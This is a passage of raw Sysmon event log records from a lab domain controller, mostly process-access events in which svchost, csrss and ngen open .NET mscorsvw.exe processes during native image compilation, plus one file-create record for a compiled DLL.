e+8198|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1d64|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+277a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2708|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005977Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:46:17.843{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-9129-6005-BF01-00000000A301}4692C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005976Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:46:17.828{59A5CD1D-8E44-6005-0500-00000000A301}6401180C:\Windows\system32\csrss.exe{59A5CD1D-9129-6005-BF01-00000000A301}4692C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000005975Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:46:17.828{59A5CD1D-90A0-6005-2E01-00000000A301}47125100C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{59A5CD1D-9129-6005-BF01-00000000A301}4692C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6d87|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2066|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8b84|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6ad3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+69a3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+1f19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8198|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1d64|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+277a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2708|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005974Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:46:17.718{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-9129-6005-BE01-00000000A301}1556C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005973Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:46:17.703{59A5CD1D-8E44-6005-0500-00000000A301}6401180C:\Windows\system32\csrss.exe{59A5CD1D-9129-6005-BE01-00000000A301}1556C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000005972Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:46:17.703{59A5CD1D-90A0-6005-2E01-00000000A301}47125100C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{59A5CD1D-9129-6005-BE01-00000000A301}1556C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6d87|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2066|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8b84|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6ad3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+69a3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+1f19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8198|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1d64|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+277a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2708|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005971Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:46:17.578{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-9129-6005-BD01-00000000A301}2352C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005970Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:46:17.562{59A5CD1D-8E44-6005-0500-00000000A301}640656C:\Windows\system32\csrss.exe{59A5CD1D-9129-6005-BD01-00000000A301}2352C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000005969Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:46:17.562{59A5CD1D-90A0-6005-2E01-00000000A301}47125100C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{59A5CD1D-9129-6005-BD01-00000000A301}2352C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6d87|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2066|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8b84|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6ad3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+69a3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+1f19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8198|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1d64|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+277a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2708|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005968Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:46:17.484{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-9129-6005-BC01-00000000A301}4584C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005967Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:46:17.484{59A5CD1D-8E44-6005-0500-00000000A301}6401180C:\Windows\system32\csrss.exe{59A5CD1D-9129-6005-BC01-00000000A301}4584C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000005966Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:46:17.484{59A5CD1D-90A0-6005-2E01-00000000A301}47125100C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{59A5CD1D-9129-6005-BC01-00000000A301}4584C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6d87|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2066|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8b84|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6ad3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+69a3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+1f19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8198|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1d64|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+277a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2708|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 11241100x80000000000000005965Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localDLL2021-01-18 13:46:17.390{59A5CD1D-9128-6005-BB01-00000000A301}3260C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_64\Temp\cbc-0\Microsoft.Internal.Tasks.Dataflow.dll2021-01-18 13:46:17.390 10341000x80000000000000006001Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:46:18.468{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-912A-6005-C701-00000000A301}4856C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006000Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:46:18.453{59A5CD1D-8E44-6005-0500-00000000A301}640756C:\Windows\system32\csrss.exe{59A5CD1D-912A-6005-C701-00000000A301}4856C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000005999Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:46:18.453{59A5CD1D-90A0-6005-2E01-00000000A301}47125100C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{59A5CD1D-912A-6005-C701-00000000A301}4856C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6d87|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2066|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8b84|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6ad3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+69a3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+1f19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8198|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1d64|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+277a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2708|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005998Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:46:18.406{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-912A-6005-C601-00000000A301}2368C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005997Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:46:18.390{59A5CD1D-8E44-6005-0500-00000000A301}6401180C:\Windows\system32\csrss.exe{59A5CD1D-912A-6005-C601-00000000A301}2368C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000005996Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:46:18.390{59A5CD1D-90A0-6005-2E01-00000000A301}47125100C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{59A5CD1D-912A-6005-C601-00000000A301}2368C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6d87|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2066|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8b84|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6ad3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+69a3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+1f19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8198|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1d64|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+277a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2708|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005995Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:46:18.171{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-912A-6005-C501-00000000A301}4412C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005994Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:46:18.171{59A5CD1D-8E44-6005-0500-00000000A301}640656C:\Windows\system32\csrss.exe{59A5CD1D-912A-6005-C501-00000000A301}4412C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000005993Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:46:18.171{59A5CD1D-90A0-6005-2E01-00000000A301}47125100C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{59A5CD1D-912A-6005-C501-00000000A301}4412C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6d87|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2066|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8b84|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6ad3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+69a3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+1f19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8198|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1d64|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+277a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2708|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005992Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:46:18.109{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-912A-6005-C401-00000000A301}884C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005991Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:46:18.093{59A5CD1D-8E44-6005-0500-00000000A301}640756C:\Windows\system32\csrss.exe{59A5CD1D-912A-6005-C401-00000000A301}884C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000005990Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 